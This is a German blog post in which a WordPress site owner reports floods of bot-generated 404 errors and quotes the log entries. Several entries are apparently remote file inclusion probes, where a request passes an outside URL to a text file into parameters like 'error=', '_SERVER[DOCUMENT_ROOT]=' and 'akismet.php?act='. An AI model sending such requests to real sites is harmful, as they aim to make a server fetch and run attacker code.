In den letzten Tagen ist mir aufgefallen, dass vermehrt viele seltsame 404 Seiten auf meinen WordPress Systemen produziert werden. Teilweise laufen an einem Tag 100 bis 200 404 Fehlerseiten auf, die aus den verschiedensten Quellen produziert werden, die so rein gar nichts mit fehlerhafter Verlinkung, Vertippern oder ähnlichem zu tun haben. Da stellt sich mir die Frage, was der Grund dafür ist, wie so etwas zusammen kommt? Könnte das z.B. ein Hacking oder Spam Angriff sein, ist ein Virus im Umlauf oder was zum Henker ist das?
Um diesen seltsamen 404 Seiten auf den Grund zu gehen, reicht mir mein statistikeigenes 404 Reporting nicht so ganz aus. Damit ich aber auch nicht immer die Access Logs von oben bis unten durchwühlen muss, habe ich mich für zwei weitere Lösungen entschieden.
Zum einen habe ich das Plugin JH 404 Logger installiert, das mir in einem Widget im Dashboard die neuesten 404 Seiten auflistet.
Weiter habe ich bei André einen interessanten Artikel gefunden: 404 – Error Reporting in WordPress, und mir die eMail Lösung daraus auf meinem Blog vorübergehend installiert. So erhalte ich vorübergehend bei jedem 404 Seitenaufruf eine eMail und kann die entsprechenden Daten eingehender unter die Lupe nehmen. Dass hier ein paar Tage lang ein paar hundert eMails eintrudeln habe ich bei dieser Lösung erst einmal in Kauf genommen.
Meine Blogeigene 404 Lösung, die Seiten nicht entsprechend anzuzeigen, sondern ganz einfach nur die 404 Seiten per 301 auf die Startseite weiterzuleiten, bleibt dabei erhalten. In diesem Fall, wo nun gerade so viele 404 Seiten von außen generiert werden, ist diese Lösung auch eindeutig zu bevorzugen. Diese 404 Seiten werden nicht von Menschen produziert, sondern automatisiert von Bots und was der Bot am Ende zu sehen bekommen, ist sowieso total Banane, denn er hat ja gar keine Augen und will ja auch gar nicht wirklich was produktives von mir, sondern ich vermute eher das Gegenteil.
Nun möchte ich Euch noch den Ursprung der ein oder anderen 404 Seitengenerierung dieser Bots zeigen. Vielleicht hat von Euch jemand eine Ahnung was das sein könnte?
So wurden zum Beispiel von einem Bot namens betaBot innerhalb von 24 Stunden ca. 200 404 Seiten generiert, die immer eine bestehende URL hinter meine Domain URL kleben, wie z.B.:
User IP: 62.178.217.28
Fehler Seite: meineurl/http:/www.enzymologie.de/Men-Health-Best-Fett/1review/3499620510.html
Referer:
User Agent: betaBot
Ein weiteres Beispiel des betaBots:
User IP: 62.178.217.28
Fehler Seite: meineurl/http:/www.plakative-werbung.de/kontakt.htm/datenubertragung.htm
Referer:
User Agent: betaBot
An diesen beiden Beispielen sieht man sehr deutlich, dass hinter meine Domain URL eine weitere URL geklebt wird und dass es keinen Referrer gibt, also der Ursprung nicht eine falsch verlinkte Seite ist, sondern der User Agent, dieser betaBot, selbst. Auffallend an diesen paar hundert 404 Seiten war auch, dass die User IP immer die gleiche ist, die URL die hinter meine Domain URL geklebt wird, aber immer eine andere. Teilweise existieren diese dran geklebten URLs im Netz, teilweise nicht. Es sieht auf den ersten Blick so aus, als würde dieser betaBot mich für einen Proxy Server halten.
Weitere seltsame Beispiele anderer Bots:
User IP: 217.169.210.130
Fehler Seite: meineurl/2009/02/blog-seo-tips/xhtml-code-und-css-w3c-konform.html//images/errors.php?error=http://home.covenantberks.org/language/chi.txt??
Referer:
User Agent: libwww-perl/5.76
oder:
User IP: 62.182.62.35
Fehler Seite: meineurl/2009/02/blog-seo-tips/xhtml-code-und-css-w3c-konform.html//images/errors.php?error=http://niana.org//tmp/id.txt??
Referer:
User Agent: libwww-perl/5.805
oder:
User IP: 83.133.121.221
Fehler Seite: meineurl/2009/06/blog-seo-tips/double-cont...co-framebuster-hilft.html%20%20///////?_SERVER[DOCUMENT_ROOT]=http://cafe5.fileave.com/id1.txt?
Referer:
User Agent: Mozilla/5.0
Auch das hier ist interessant, denn Akismet war noch nie bei mir installiert:
User IP: 212.249.57.201
Fehler Seite: meineurl/2009/02///wp-content/plugins/akismet/akismet.php?act=http://impeel.com/impeel/web/css/v2-id.txt?
Referer:
User Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)
Bezeichnend an diesen ganzen 404 Seiten: Sie treten in Scharen auf, werden mehrere Minuten lang 10 bis 20 mal ausgeführt, immer wieder mit anderen URLs hinten dran, dann ist für ein paar Stunden Ruhe und dann geht der ganze Spuk wieder von vorne los. Nicht nur dieser mein Blog ist betroffen, sondern alle meine Domains, auf denen WordPress läuft.
Was zum Henker ist das? Als Spam würde ich das definitiv bezeichnen. Könnte das ein Virus oder ein Hacking Angriff sein? Was für Auswirkungen hat das auf die entsprechenden Domains? Gibt es vielleicht einen Zusammenhang mit den fehlenden Seiten im Google Index? Ich verstehe ehrlich gesagt nur noch Bahnhof.
Ich würde mich auch wetten trauen, dass nicht ich als einzige davon betroffen bin. Problem dabei ist nur, dass kaum einer seine 404 Seiten eingehend prüft und es deswegen nicht bemerkt. Wie siehts bei Euch aus?
Aus Sicherheitsgründen musste ich in den Codebeispielen bei den Fehlerseiten http://www.crazytoast.de mit meineurl ersetzen, da sonst bei jedem Seitenaufruf Fehlerseiten generiert werden!